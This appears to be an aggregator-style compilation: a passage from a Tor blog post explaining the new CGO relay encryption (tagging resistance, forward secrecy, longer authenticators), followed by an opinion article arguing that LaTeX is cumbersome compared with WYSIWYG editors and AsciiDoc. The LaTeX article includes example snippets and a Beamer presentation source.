In many modern online protocols, including messaging apps like Signal , the keys used to decrypt a message are destroyed as soon as the message is decrypted, so that nobody can steal them and use them later on. But Tor's old encryption algorithm (tor1) doesn't provide this property: the same AES keys are used for the entire life of the circuit. That means that if a key was stolen while the circuit was still alive, all previous traffic on the circuit could be decrypted.

When a circuit's lifetime is on the order of minutes, that's not so bad, but sometimes circuits stay around for days. (What's more, longer-lived circuits may be better for anonymity, especially when the user is maintaining a persistent identity, so it's a good idea to make them stronger.)

Although this attack is minor in comparison to the tagging issue, we may as well address it while we are updating our encryption.

Problem 3: A 4-byte authenticator? Seriously?

Yeah, that's not great. The use of a mere 4-byte digest means that there's a one-in-4-billion chance to forge a cell undetected.

That isn't a very good attack in practice: if the attacker doesn't get lucky with their guess, then their invalid message causes the circuit to fail, and they can't try again unless the client builds another circuit through them. The same pathbias mechanisms that help resist tagging attacks also help here, but it would be better not to need them.

(Also, it's using SHA-1, which is showing its age, to say the least. 2 )

So, how did we think about replacing this in the past?

We've wanted to replace this algorithm a few times, but we've been hung up on issues of design and efficiency.

We definitely don't want to follow remailer designs by adding one authenticator per layer of encryption: that way lies big overhead. If we tried something like that with onion services, we'd be devoting something like 15% of our bandwidth to authenticator fields.

One promising design element has been wide-block ciphers : these are ciphers (or modes of using ciphers) that encrypt an entire message as if it were a single opaque block: any change in the ciphertext garbles the entire message as if it were a single block in a regular block cipher.

(Technically, this needs to be a " strong pseudorandom permutation " (SPRP) if it's going to resist tagging attacks.)

You can make a wide-block cipher into an authenticated cipher by reserving some portion of the plaintext for a known value -- say, 16 bytes of zeros.

But most wide-block cipher designs are comparatively expensive. Nearly all of the strong ones (BEAR, LIONESS, biIGE, HHFHFH) require two full encryptions and two hashes over the data. Newer modes like HCTR2 require only one encryption pass, but still need two hashes. (For comparison: tor1 requires 3 encryptions and one hash for a cell on a 3-hop circuit, whereas one of these designs requires on the order of 6 encryptions and 6 hashes.)

We're willing to pay some CPU cost for improved cryptography (and we should expect to pay some cost, since authentication doesn't come for free) but we need to keep the cost to a minimum.

Now, multiple passes are necessary for any wide-block design: it's provable that there's no way to make sure that changing any bit will potentially garble every other bit unless there are at least two passes. But we'd like to make these passes as cheap as possible!

There has also been excellent work on other wide-block designs built from scratch, rather than from an underlying cipher (notably AEZ ).

What are we going with?

For years now, cryptographers have been looking for good solutions here.

Jean Paul Degabriele , Alessandro Melloni , Jean-Pierre Münch , and Martijn Stam have a design that they're calling Counter Galois Onion (CGO). It's based on a kind of construction called a Rugged Pseudorandom Permutation (RPRP): essentially, it's a design for a wide-block cipher that resists malleability in one direction (for the encrypt operation, but not the decrypt operation). If we deploy this so that clients always decrypt and relays always encrypt, then we have a tagging resistant 3 cipher at less cost than a full SPRP!

Using an RPRP that they call UIV+ (see the paper), the authors achieve all of our goals (tagging resistance, immediate forward secrecy, longer authentication tags, limited bandwidth overhead, relatively efficient operation, and modernized cryptography).

(Shortly before this blog post went up, they revised their paper and released a new security proof .)

We've written a specification which matches their paper and their reference implementation.

How does it work?

CGO makes it so that if anybody tampers with any part of your encrypted data, the entire message, and all future messages, become unrecoverable. Here's how!

(If you don't like reading cipher diagrams, you may want to skip this section. And if you really like reading them, you should check out the specification and the paper !)

The figures below present the UIV+ building block, and show how it is used to build CGO encryption.

Figure 3: UIV+ encryption

The input X is split into two parts: a short X_L and a longer X_R. X_R and a "tweak" value H are themselves passed as tweaks to a tweakable block cipher E_T (instantiated with LRW2), which is then used to encrypt X_L. The output of this encryption seeds a PRF, which is xored into X_R to encrypt it.

Figure 4: Middle-layer CGO encryption.

CGO treats every message as a 16-byte tag T, and a 493-byte ciphertext C. These are passed as X_L and X_R to the UIV+ encryption algorithm above. The tweak value (H in UIV+) is here called T': each cell's "T" value, after encryption, is taken as the T' for the next cell.

Figure 5: Originating a CGO message

When originating the message, CGO initializes its tag as a nonce value N. The value of N, and the encryption keys, are all transformed using an "Update" algorithm as the message is encrypted. The new N, and the new encryption keys, will be used to encrypt the next cell.

Okay, but how does all of this cryptography solve the problems we began with?

First (and most importantly) tagging attacks are prevented by two factors:

  1. When encrypting 4 , the message is transformed in a wide-block construction, so that any change to the input renders the entire output unrecoverable.
  2. The chaining of T' and N values means that a message's encryption depends on all previous messages , so if a single message is garbled, all subsequent messages will be unrecoverable.

Second, forward secrecy is achieved with the Update construction in figure 5. Every time a new cell is originated or received, the keys used to originate or receive it are transformed unrecoverably, so that the encryptor/decryptor no longer holds the keys necessary to decrypt earlier cells.
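
CGO's actual Update algorithm is specified in the paper; purely as a conceptual illustration of why ratcheting keys forward gives this property, here is a toy hash-based key update in Python. This is not CGO's construction, just a sketch of the "use a key once, derive the next one one-way, forget the old one" idea.

# Toy key ratchet: each step derives the next key and discards the old one,
# so a later compromise cannot decrypt earlier traffic. Not CGO's Update.
import hashlib
import os

class RatchetingKey:
    def __init__(self, initial_key: bytes):
        self._key = initial_key

    def use_and_update(self) -> bytes:
        current = self._key
        # Derive the next key one-way from the current one, then forget it.
        self._key = hashlib.sha256(b"update" + current).digest()
        return current

k = RatchetingKey(os.urandom(32))
key_for_cell_1 = k.use_and_update()
key_for_cell_2 = k.use_and_update()
# After these calls, key_for_cell_1 cannot be recomputed from the state in k.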

Third, the truncated digest is now replaced with a nice long 16-byte authenticator, like sensible people use.

Aside: What if we're wrong?

CGO is a fairly new design, and it's reasonable to ask whether there could be weaknesses in it that would make it worse than it's designed to be. I'd answer: There might be! Attacks only get better with time, and although the cryptographers behind CGO are skilled and well regarded, even the best cryptographers can make mistakes. There is a security proof , but it's fairly recent, and it hasn't yet gotten intensive scrutiny. With time, as CGO gets attention from more cryptographers, we'll (hopefully) gain more confidence in its strength. (And if we do decide that we need to replace it, the work we've done to add it to Arti and the C Tor implementation will make a later migration to a different system much easier.)

But what we are pretty sure about is that there aren't likely to be any weaknesses in CGO that would make it worse than tor1.

Where does our implementation stand?

It's underway!

We've implemented the cryptography for Arti, the Rust Tor implementation. We've also implemented it in C, since it won't do us any good unless relays support it too, and the Arti relay project is still a work in progress.

In order to build this implementation, we've had to refactor a lot of code to revise its existing assumptions: for example, we've had to revise all the places where we assumed anything about the layout of a relay cell, or where we assumed that there was only one way to do relay encryption. These changes will help us with any other changes to relay cell formatting and encryption in the future.

Our next steps are:

  • Enable CGO by default in Arti. (It's currently marked as experimental because of some of its dependencies.)

  • Implement CGO negotiation for onion services. (This feature is likely to be Arti-only, due to its complexity.)

  • Tune the performance for modern CPUs. (The CGO authors got impressively good results for their optimized implementation, but some of the tricks they used will be pretty hard to deliver in the C Tor implementation without big refactoring. Fortunately, there are some low-hanging fruit in optimizing what we have today.)

Thanks for your help!

Thanks to all the cryptographers, programmers, researchers, and cypherpunks who have contributed to this work over the years. Thanks also to all the researchers who have advanced this work, and the state of modern cryptography; we all stand on the work they have built.

And thanks to Mike Perry for helping me write this and get the parts of the threat model right.

And finally, thanks to everybody who has donated to Tor over the years! A lot of this work is done through a grant from the Bureau of Democracy, Human Rights, and Labor , but many critical parts of this work (including years of past groundwork, and all the parts related to onion services) have been paid for out of our unrestricted funds, which rely on donors like you. Thanks for believing in our mission, and thanks for helping to make Tor better! <3

Is LaTeX worth it? (2023)

Lobsters
philipphagenlocher.de
2025-11-24 20:01:20
Comments...
Original Article

Introduction

While LaTeX is rightfully praised for its qualities, its (sometimes obvious) flaws are often ignored or downplayed. The learning curve is quite steep and its usability is far from optimal. Is it even worth it to learn LaTeX? What kind of work can we realistically get done using it? Are there alternatives? When do we really need LaTeX?

IMPORTANT

All throughout this post I will use the name “LaTeX” to refer to the holistic view on the system for creating documents, including the TeX typesetting system, LaTeX macros, associated distributions (pdfTeX, XeTeX, etc.) and common editors.

This post is aiming to provide a critical view, mainly highlighting problems and shortcomings. It is not meant as a fair assessment of the pros and cons. This is a rant; you have been warned.

To start the discussion I first want to go into my experience with LaTeX.

Perfect Typesetting Made Easy?

My history with LaTeX started over 10 years ago. I was fed up with WYSIWYG editors after working with Microsoft Word 2007 for a while. Images constantly jumping around, formatting randomly breaking when content changes and no easy way to manipulate the fundamental style of a document after its creation. “There must be a better way,” I thought. And a better way there was.

The Promise…

After looking around online I stumbled upon LaTeX which was praised as the perfect alternative to visual editors. The promise was simple. Don’t worry about formatting or typesetting, just worry about your writing! Design and content are separated and defaults are not just sane, but virtually optimal.

Obviously, I started learning LaTeX and started using it for everything. School work, letters, applications, CVs, presentations, later university work, random manuscripts, software documentation, white papers and any other kind of written document. Why use a visual editor to create diagrams when there is TikZ ? Why worry about using proprietary editors when LaTeX distributions are open-source, cross-platform and you can use any editor you like?

It seemed to me that LaTeX was the ultimate way of constructing any document. Why learn different document editors or even a publishing software like InDesign when everything can be done with one unified interface?

…meets Reality

I woke up from this dream when I tried to design a quote template for a small business I had. Designing a document with an address section, a small table and some bank details in its footer that didn't look pretentious was almost impossible. Changing font families and sizes? Changing spacing in a table? An utter chore.

At this point I tried something new and redid the document in LibreOffice Writer. It looked much better… and was done in a fraction of the time even though I had virtually no idea how to use Writer. 1

Of course, this was only a small setback in my journey. My first real dissatisfaction arose when using LaTeX for its intended use case: large documents. While writing both my bachelor's and master's theses I have gotten to know the good and some of the bad parts of LaTeX quite well. I started noticing that the bad, annoying and productivity-destroying parts were harder and harder to ignore. However, I was still convinced that it was the best way to construct documents.

When starting work on my book , I was surprised that my publisher wasn’t using LaTeX but AsciiDoc . This obviously didn’t compute with me at first. However, after working with AsciiDoc for way over a year now it made me rethink many problems that an author has to face when using LaTeX. I want to highlight these problems in the following sections starting with my greatest pain point.

Handling the Syntax

The syntax of LaTeX is weirdly verbose yet unspecific, very expressive yet cryptic and, while trying to make the job of the author easier, a nightmare to type quickly. I think this is one of the major problems of adopting LaTeX for most people.

What Am I Reading?

The source of a LaTeX document is hard to read. By that I don’t mean the physical act of reading the letters on the screen but ascertaining the overall structure of a document just from looking at the source. A LaTeX document consists of many varied control structures that act interdependently. Some change the formatting, some change the font characteristics and many of them add completely new features. Every package that is added to the document adds its own commands and environments with their own rules. Reading something you haven’t written yourself is puzzling.

The readability is worsened by the absurd number of symbol control sequences present. You cannot simply copy a UTF-8 symbol from the web into your document. You cannot just type Wörds with umlauts and expect them to work. You want to include the € symbol? Well, that requires a special package import for it to work and you will have to write it like so: \euro{} . Every triviality has its numerous hoops to jump through.

It also doesn’t help that LaTeX mixes imperative and declarative styles in its language. While most directives work declaratively, like environments, others have to be used in the correct sequence. Examples for imperative directives are font sizes ( \tiny , \Large , etc.), spaces ( \vspace , \stretch , etc.) and fills ( \hfill , \vfill ). Font style ( \textbf , \textit , etc.) is done declaratively, however.

This leads to bizarre syntax like this:

\Huge % Set text size to "Huge"
\begin{center} % Begin centering
  Title % Only this is centered
\end{center} % End centering
\vspace{10pt} % Add vertical space
\Large % Set text size to "Large"
\noindent % Do not indent the next line
\textbf{Lorem ipsum} dolor sit amet, % Set the first two words to bold
\normalsize % The following text is normal sized
consectetur adipiscing elit. % Just normal text

However, this can be cleaned up slightly by defining a scope for directives such as \Huge . We then end up with this snippet, which is not much better:

{\Huge % Begin "Huge" text size
  \begin{center} % Start centering
    Title % Only this is centered
  \end{center} % End centering
} % End "Huge" text size
\vspace{10pt} % Add vertical space
\noindent % Do not indent the next line
{\Large % Begin "Large" text size
  \textbf{Lorem ipsum} dolor sit amet, % Set the first two words to bold
} % End "Large" text size
consectetur adipiscing elit. % Just normal text

While this might be an artificial and exaggerated example it aims to highlight the inherent problem of the syntax. Each command needs to be evaluated based on where in the code it shows up and what it is surrounded by. For example, \noindent only works if there is no space between it and the next line.

\noindent % This works
I am not indented.

\noindent % This also works
% This comment doesn't count as a blank line
I am also not indented.

\noindent % This doesn't work

I am indented.

In complex documents it is simply not possible to accurately surmise how different directives act on the structure. The complexity is augmented by interdependence between packages leading to confusion on how they change the behavior of other packages like in this example:

\usepackage{hyperref}
\usepackage{cleveref} % Has to be loaded after hyperref!

hyperref is a prime candidate for this problem as can be seen here . This problem worsens when we take into account how code from different packages interacts. As a trivial example, one might look at problems that arise when using figures and the multicol package. To quote Overleaf :

Floats in the multicol package are poorly supported in the current version. Elements inserted with the conventional figure and table environments will show up only at the top or bottom of the next page after they are inserted, and will break the layout.

However, when the question of how included packages work is solved the problems are only beginning. Let’s look at bloated syntax for basic lists.

Verbose Environments

enumerate and itemize provide very simple functionality with inanely complicated syntax. Their job is to define a simple list, either with numbers or bullet points. The problem comes in the way they are written down. Every list has to be wrapped in a special environment.

\begin{enumerate}
    \item First
    \item Second
    \item Third
\end{enumerate}

This seems fine at first until you realize that in nested lists, you have to define an environment inside an environment and each subsequent sub-list has to have its own begin and end .

\begin{enumerate}
    \item First
    \begin{enumerate}
        \item First Sub
        \item Second Sub
    \end{enumerate}
    \item Second
    \begin{enumerate}
        \item Third Sub
        \item Fourth Sub
    \end{enumerate}
\end{enumerate}

In WYSIWYG editors writing such lists is easy, intuitive and can be navigated really quickly with simple keyboard shortcuts. In Markdown-like languages, it’s even easier.

* First
  * First Sub
  * Second Sub
* Second
  * Third Sub
  * Fourth Sub

The syntax for environments, be it for lists, text-alignment, figures, tables, code listings, and almost anything else is simply cumbersome. While configured editors can help with automatically completing the syntax it is still hard to edit existing constructs.

Error Proneness

Let’s look at what can go wrong with these environments:

 1\documentclass{article}
 2
 3\begin{document}
 4
 5\begin{itemize}
 6    \item Foo
 7    \begin{itemize}
 8        \item Bar
 9    % Missing end!
10\end{itemize}
11
12\end{document}

While trying to compile this, pdfTeX will tell us that an error occurred:

! LaTeX Error: \begin{itemize} on input line 5 ended by \end{document}.

See the LaTeX manual or LaTeX Companion for explanation.
Type  H <return>  for immediate help.
 ...

l.12 \end{document}

Your command was ignored.
Type  I <command> <return>  to replace it with another command,
or  <return>  to continue without it.

However, if you have configured your build chain to ignore such errors (or you are using Overleaf which does so by default!) you will get a result regardless. This file will be converted into a list that looks like this:

  • Foo
    • Bar

This might not seem that bad at first. However, it becomes incredibly confusing once the error occurs in a larger document. What happens after we add another itemize environment after the first one?

 1\documentclass{article}
 2
 3\begin{document}
 4
 5\begin{itemize}
 6    \item Foo
 7    \begin{itemize}
 8        \item Bar
 9    % Missing end!
10\end{itemize}
11
12\begin{itemize}
13    \item Baz
14\end{itemize}
15
16\end{document}

What will happen now? Just from looking at the code, we might conclude that the second top-level itemize environment will start a new list. Sadly, this is not the case. While we will be presented with the same error as before, the result will look like this:

  • Foo
    • Bar
    • Baz

Very confusing and a complete nightmare if such an error went unchecked in a large document. It does not help that the error message points us to the wrong itemize environment. The problem occurs for the environment in line 7, not in line 5. A beginner might be completely left in the dark when trying to figure out what went wrong with their document.

The Problem of Ubiquity

This problem is amplified by the fact that environments are used for practically everything . They are the main control structure in LaTeX documents. We cannot get around using them, and we end up having to build large, nested environment monsters. Luckily, we can define aliases for these environments or even wrap them in a simple command. Here is a little example of a command that creates a slide with two independently scaled images in a Beamer presentation:

 1\newcommand{\twoimageslide}[6] {
 2  \begin{frame}{}
 3    \centering
 4    \footnotesize
 5    \begin{minipage}[b]{0.45\linewidth}
 6      \centering
 7      \includegraphics[scale=#3]{Images/#1}\\
 8      #2
 9    \end{minipage}
10    \begin{minipage}[b]{0.45\linewidth}
11      \centering
12      \includegraphics[scale=#6]{Images/#4}\\
13      #5
14    \end{minipage}
15  \end{frame}
16}

And here is how it is used:

\twoimageslide{foo.jpg}{First title}{0.4}{bar.jpg}{Second Title}{0.6}

This can make working with environments slightly simpler. However, now all the complexity of environments is hidden away and might lead to problems later. For example, what if a code listing ( lstlisting environment) is used? It turns out you cannot simply use that in a Beamer presentation without using fragile frames.

This leads to completely incomprehensible problems later down the line. Custom commands and environments are inherently not portable without a lot of extra work put into them. While this might be a fine tradeoff for package authors on CTAN, it is a horrible cost for an author to bear. The portability issues get even worse when looking at document-specific configurations.

Taking Control over Document Style

The pervasive promise of LaTeX is that the actual content and its formatting are separated. Here is a quote from the LaTeX-Project’s about page .

LaTeX is not a word processor! Instead, LaTeX encourages authors not to worry too much about the appearance of their documents but to concentrate on getting the right content. […] LaTeX is based on the idea that it is better to leave document design to document designers, and to let authors get on with writing documents.

There are two problems with this promise:

  1. It’s broken in most documents
  2. The author often is the designer

First, let’s take a look at the first point.

Package configurations

It is not uncommon to find code like this at the start of many LaTeX documents:

 1\usepackage{hyperref}
 2\hypersetup{
 3    colorlinks=true,
 4    urlcolor=blue
 5}
 6
 7\usepackage{listings}
 8\usepackage{xcolor}
 9
10\definecolor{codegreen}{rgb}{0,0.6,0}
11\definecolor{codegray}{rgb}{0.5,0.5,0.5}
12\definecolor{codepurple}{rgb}{0.58,0,0.82}
13\definecolor{background}{rgb}{0.95,0.95,0.92}
14
15\lstdefinestyle{code}{
16    backgroundcolor=\color{background},
17    commentstyle=\color{codegreen},
18    keywordstyle=\color{magenta},
19    numberstyle=\tiny\color{codegray},
20    stringstyle=\color{codepurple},
21    ... % many options omitted for brevity
22    tabsize=2
23}
24
25\lstset{style=code}

In the first five lines, the hyperref package is included and configured to use blue as its link color. The following lines define colors and a style for code listings.

This is the first break of our promise. Setting up packages correctly is not handled externally, but in the very document the author is working on. Of course, these configurations could be put in a special settings.tex or preamble.tex file which is included in the main TeX file, but what if the author wants to add more packages?

The main problem here is that LaTeX files combine formatting and content. It does not work like HTML and CSS, where HTML is used for the structure and CSS is used for the style of a document. While LaTeX has its own style files ( .cls and .sty ) the separation doesn’t work as well, since these files are used to determine the structure of the content beforehand. This can be read about here :

In the ideal case, a class file will completely define the structure of the document. The familiar article class is a good example: it provides commands for typesetting articles, such as \section , \tableofcontents , \author and so on.

This means that our content files are inherently linked to predefined structure, making them not portable. Turning a normal article to a book, a book to a presentation, or a presentation to an article becomes cumbersome and forces the author to think about formatting and technical details.

Depending on how your file is later used, you as the author have to make sure that certain formatting is taken care of. Sometimes, page numbers have to be explicitly disabled (using \pagestyle{empty} ) or the document is restrained to using a fixed selection of packages. This forces the author to write down content differently. For example, it makes a big difference whether listings or minted is used to support code listings, and the author is forced to adhere to the control structures of the used package.

In document preparation systems like AsciiDoc such features have a much simpler interface, which leaves the actual formatting to internal settings of the AsciiDoc processor, far away from the author.

Outside of professionally published books, the author fundamentally has to worry about the design of their document. In doctoral theses, academic papers and presentations the author is tasked with making sure that the document looks good and readable. Even though LaTeX is very good at keeping a document readable, it cannot work wonders. Aesthetic decisions like line height, font type or margins and paddings around inserted graphics often need work and cannot be left to the machine to figure out.

LaTeX has mostly sane defaults for all of these parameters. Thus it is very opinionated. You can ask it nicely to put a figure at a certain position in the document, but without some work the typesetter is allowed to simply ignore your request. Manually overriding these decisions makes the source even more unreadable and much harder to deal with.

One way of taking control over the document is overriding macros like \baselineskip or \parskip to change the general look of the document. Another method is using \vspace and \hspace to add (or even remove) space around certain elements.

The disadvantage of these methods is that the otherwise sane defaults now break down completely and the document becomes as fragile as your average WYSIWYG editor experience. Now, we are once again forced to take the imperative document style into account, carefully evaluating when certain parameter changes hold true and when they don't. At this point the syntax of LaTeX makes it hard to figure out what is shown, and the complicated logic running in the background makes it almost impossible to gauge how anything will look. It is at this point that the clear advantage of applications such as LibreOffice Writer, Microsoft Word or Adobe InDesign becomes apparent. LaTeX simply isn't made to design anything. If you don't like its defaults you are simply out of luck.

Beamer Presentations

Beamer presentations are ugly. They are so, so ugly. Just look at the default themes . They are pure visual clutter. Useless progress indicators at the top, redundant information at the bottom, horrendous colors, ugly skeuomorphic balls for bullet points, drop shadows from the 2000s, weird interactive navigation elements, which most people deactivate anyway; all of it is awful. 2 Every fiber of my body screams in agony when I have to look at those ugly, ugly slides. Using Beamer never felt right to me. The presentations simply never looked good, no matter how hard I tried.

It seems that I am not the only one who tried. A quick look at the template collection on Overleaf shows how many institutions and authors have tried to make Beamer look good. It cannot be a coincidence that most templates look like a stock template with an adjusted palette. As was already discussed, changing the design in LaTeX documents is hard.

Tip

One of the few templates that fixes a lot of problems found with Beamer is the TU Delft presentation template . I’m sure that after removing the logo, one could make a nice looking presentation with it.

I also tried my hand at creating a better presentation from the default templates. When I was still in university I played around with a minimalist approach to presentation design, which was the only time I felt productive working with Beamer. My solution to the design problem was to restrict myself to a fixed number of slide types:

  • Single image + caption
  • Two images + captions
  • Centered title
  • Equation
  • Quote

Then I could write commands that got the design of these slide types exactly right and applied the design rules to the content. The presentation looks like this and here is the (poorly formatted 3 ) source for it:

Presentation Source
  1\documentclass[11pt]{beamer}
  2\usetheme{Boadilla}
  3\usepackage[utf8]{inputenc}
  4\usepackage{amsmath}
  5\usepackage{amsfonts}
  6\usepackage{amssymb}
  7\usepackage{varwidth}
  8\usepackage{graphicx}
  9\author{Philipp Hagenlocher}
 10\title{Fermats letzter Satz und Andrew Wiles}
 11\setbeamercovered{transparent}
 12\date{12. Januar 2019}
 13
 14%gets rid of bottom navigation symbols
 15\setbeamertemplate{navigation symbols}{}
 16%gets rid of footer
 17\setbeamertemplate{footline}{}
 18
 19\newenvironment{titleframe}
 20{
 21\begin{frame}[plain]{}
 22\LARGE
 23\centering
 24}
 25{
 26\end{frame}
 27}
 28
 29\newenvironment{citext}
 30{
 31\begin{center}
 32\begin{varwidth}{0.925\textwidth}
 33}
 34{
 35\end{varwidth}
 36\end{center}
 37}
 38
 39\newcommand{\grame}[3] {
 40\begin{frame}{}
 41\centering
 42\begin{minipage}[b]{\linewidth}
 43\centering
 44\footnotesize
 45\includegraphics[scale=#3]{Images/#1}\\
 46#2
 47\end{minipage}
 48\end{frame}
 49}
 50
 51\newcommand{\gwome}[6] {
 52\begin{frame}{}
 53\centering
 54\footnotesize
 55\begin{minipage}[b]{0.45\linewidth}
 56\centering
 57\includegraphics[scale=#3]{Images/#1}\\
 58#2
 59\end{minipage}
 60\begin{minipage}[b]{0.45\linewidth}
 61\centering
 62\includegraphics[scale=#6]{Images/#4}\\
 63#5
 64\end{minipage}
 65\end{frame}
 66}
 67
 68\newcommand{\trame}[1] {
 69\begin{titleframe}
 70#1
 71\end{titleframe}
 72}
 73
 74\newcommand{\erame}[1] {
 75\begin{titleframe}
 76\begin{equation*}
 77#1
 78\end{equation*}
 79\end{titleframe}
 80}
 81
 82\newcommand{\qrame}[1] {
 83\begin{titleframe}
 84\begin{citext}
 85#1
 86\end{citext}
 87\end{titleframe}
 88}
 89
 90\begin{document}
 91
 92\begin{frame}
 93\titlepage
 94\end{frame}
 95
 96\grame{wiles_conf.jpg}{Andrew Wiles (23. Juni 1993)}{1.2}
 97\grame{fermat.jpg}{Pierre de Fermat}{0.5}
 98\grame{diophantus.jpg}{Arithmetica von Diophantos (Edition aus 1621)}{0.34}
 99\gwome{mersenne.jpg}{Marin Mersenne}{0.3}{pascal.jpg}{Blaise Pascal}{0.7}
100\erame{n * \binom{n+m-1}{m-1} = m * \binom{n+m-1}{m}}
101\erame{S_m(N) = \displaystyle\sum_{i=1}^{N} n^m}
102\erame{a^p \equiv a \: (mod \: p)}
103\grame{diophantus.jpg}{Arithmetica von Diophantos (Edition aus 1621)}{0.34}
104\qrame{Es ist nicht möglich, einen Kubus in zwei Kuben, oder ein Biquadrat in zwei Biquadrate und allgemein eine Potenz, höher als die zweite, in zwei Potenzen mit demselben Exponenten zu zerlegen.}
105\erame{x^n + y^n = z^n}
106\erame{\forall_{n \in \{\mathbb{N} \setminus \{1,2\}\}} \not \exists_{x,y,z \in \mathbb{N}} \: . \: x^n + y^n = z^n}
107\erame{x^4 + y^4 = z^4}
108\erame{A_n \rightarrow A_m \: mit \: m<n}
109\grame{euler.png}{Leonard Euler}{0.3}
110\grame{germain.jpg}{Sophie Germain}{0.6}
111\gwome{legendre.jpg}{Adrien-Marie Legendre}{0.4}{dirichlet.jpg}{Peter Gustav Lejeune Dirichlet}{0.4}
112\grame{lame.jpg}{Gabriel Lamé}{0.3}
113\grame{academy.jpg}{Darstellung der französischen Akademie der Wissenschaften (1698)}{0.4}
114\gwome{lame.jpg}{Gabriel Lamé}{0.28}{cauchy.jpg}{Augustin-Louis Cauchy}{0.72}
115\grame{kummer.jpg}{Ernst Kummer}{0.6}
116\grame{wolfskehl.jpg}{Paul Wolfskehl}{0.533}
117\qrame{Sehr geehrte/r .........................,\\ \\ich danke Ihnen für Ihr Manuskript zum Beweis der Fermatschen Vermutung.\\Der erste Fehler findet sich auf:\\Seite .... Zeile ....\\Ihr Beweis ist daher wertlos.\\ \\Professor E. M. Landau}
118\grame{wiles_kid.jpg}{Andrew Wiles}{0.72}
119\grame{wiles_young.jpg}{Andrew Wiles bei seiner Abschlussfeier}{1}
120\erame{y^2 = x^3 + ax + b + c}
121\gwome{taniyama.png}{Yutaka Taniyama}{2}{shimura.png}{Goro Shimura}{0.31}
122\grame{frey.jpg}{Gerhard Frey}{0.6}
123\erame{y^2 = x(x-a^n)(x+b^n)}
124\grame{ribet.jpg}{Kenneth Alan "Ken" Ribet}{0.8}
125\trame{}
126\grame{wiles_port.jpg}{Andrew Wiles}{0.19}
127\trame{L-Funktionen und Arithmetik}
128\trame{Modulformen, elliptische Kurven und Galois-Darstellungen}
129\grame{wiles_conf.jpg}{Andrew Wiles (23. Juni 1993)}{1.2}
130\grame{katz.jpg}{Nicholas Michael "Nick" Katz}{0.3}
131\grame{taylor.jpg}{Richard Taylor}{0.61}
132\trame{}
133\gwome{wiles_port2.jpg}{Andrew Wiles}{0.6}{fermat.jpg}{Pierre de Fermat}{0.45}
134
135\end{document}

Would I have been faster just using copy-paste in a WYSIWYG? Maybe. However, now I have a template to use for further presentations! Too bad I don’t use Beamer anymore.

Collaboration & Efficiency

An important part of writing is collaboration. For the most part, documents are not the product of a lone author, but many people adding content, designing elements and reviewing changes. Sadly, LaTeX makes this essential part of authoring a complicated and frustrating endeavour.

“But I’m not a programmer!”

Most people without a background in computer technology look at LaTeX and think they are staring at the source code of a program. 4 LaTeX is a complex and unintuitive system and bringing in newcomers is hard work. You cannot send a .tex file to a random contributor expecting they can work with it. This is a death sentence for collaboration.

I am sure that the argument will be made that LaTeX is very frequently used in academia to collaborate on papers, but that is a very poor argument. It is no wonder that a homogeneous group, brought up in the very academic environment that champions the usage of LaTeX, is able to collaborate using it. However, what if interdisciplinary teams need to work on the same document?

What if people outside of academia want to contribute? Especially in business settings LaTeX has no reason to exist. Nobody cares about pretty typesetting for mathematical formulas when all you need is to copy spreadsheets from one document to the other. WYSIWYG editors are far superior when speed and efficiency are important, and business is all about optimizing these two measures.

Interop? What Interop?

Office suites have an important property: interoperability. A chart created in Excel can effortlessly be inserted into Word and automatically receive updates if the Excel file is changed. When these files live on a network share, collaboration is made easy. Data scientists publish a CSV file of their data, a consultant links this data in Excel and creates a chart from it, and a manager then links this chart into Word or PowerPoint to create presentation material. Sounds like a nice little pipeline. 5

In LaTeX such a pipeline is hard to imagine without exporting results as images. While pandas , the famous Python data analysis library, is capable of exporting data as LaTeX tables, it is rare for a simple copy and paste to just work. In this context, automation means scripting. Get those awk and sed manpages out, we are going to need them when we want to automate anything using LaTeX.
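
To be fair, the pandas side of such a pipeline is short; here is a minimal sketch (the file names and column contents are invented for illustration), it is everything around it that needs scripting:

# Sketch: turn a CSV produced elsewhere into a LaTeX table fragment with pandas.
import pandas as pd

df = pd.read_csv("results.csv")          # hypothetical input file
latex_table = df.to_latex(index=False)   # renders a tabular environment as a string
with open("results_table.tex", "w") as f:
    f.write(latex_table)
# The fragment can then be pulled into the document with \input{results_table}.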

Another problem is the integration of different data sources in the same document. What about diagrams made with Mermaid or PlantUML? AsciiDoctor allows you to use Kroki to embed the output of a wide variety of different diagram rendering backends directly into documents. A much more complicated toolchain can be built to even allow automatic exports to services such as Confluence. 6 Such interoperability is hard to imagine with documents written in LaTeX.

And what about spellchecking or editorial style linting? Most tools have no easy way of ignoring the numerous custom control structures of LaTeX documents and will produce false positives. While platforms like Overleaf have a built-in spellchecker that seems to be syntax aware, other open-source tools like Vale have no support for LaTeX and focus more on Markdown-based syntax.

That's why LaTeX doesn't even come up in discussions around the documentation as code philosophy , while languages like Markdown are used with static-site generators to automatically generate online documentation. LaTeX has simply become too much of a monolithic burden as document preparation software for it to be useful in this regard.

Slow results

In a study, Knauff and Nejasmic find that Microsoft Word users (novices and experts alike) write content quicker and produce fewer formatting and content errors than their LaTeX-using peers. 7 This is a pretty strong claim that has to be taken with a grain of salt. The study uses a small sample size of 40 participants and a single experiment, where the tasks are to recreate three pieces of text in either Word or LaTeX:

  • Continuous text
  • A table
  • Text with equations

While this seems like a fair and balanced task, we have to raise the question whether text reproduction can be used to evaluate the efficiency of document preparation systems.

Nonetheless, the results from the study are interesting. Not only did Word users outperform LaTeX users, they did so in two of three tasks. While LaTeX users performed slightly better in reproducing a text with equations, they severely underperformed in the other tasks. Word users were better at formatting a table and writing continuous text with fewer errors.

This result does not shock me. Not only do LaTeX users have to deal with horrible syntax, they also face the problem of bad editor support, unpredictable feature interactions and no way to quickly inspect their output and nudge it in the right direction. It is not far-fetched that errors in the content (like grammatical errors) could sneak into the mess of \begin and \end that a LaTeX document quickly becomes.

An Easy Alternative

Why use LaTeX when there are alternatives? Document preparation software is a vast field and many open-source projects try to carve out a space for themselves. Let’s highlight one of them.

AsciiDoc was already named a few times in this post as an alternative to LaTeX. The language is a simple-to-understand Markdown flavor with special control structures for embedding images, tables, lists, listings, admonition blocks and much more. It is used to create documents in PDF, HTML, DocBook and many other formats. The AsciiDoctor processor provides a fantastic ecosystem of plugins and tools. With asciidoctor-kroki we can embed a huge variety of plain-text diagram description languages into our document using Kroki . Using asciidoctor-mathematical we can use mathematical to render mathematical equations. Editing is made easy by the VSCode extension for AsciiDoctor, which provides a live preview of the document's structure in real time.

Let's look at a small example highlighting a few things that AsciiDoc can do, using a simple file that creates a bit of text, lists and tables. Additionally, we are using Kroki as part of our local toolchain to include diagrams in our document. Compiling this is only possible in a Docker setup with correctly configured networks, so this is just for demonstration. Here is the source for the document:

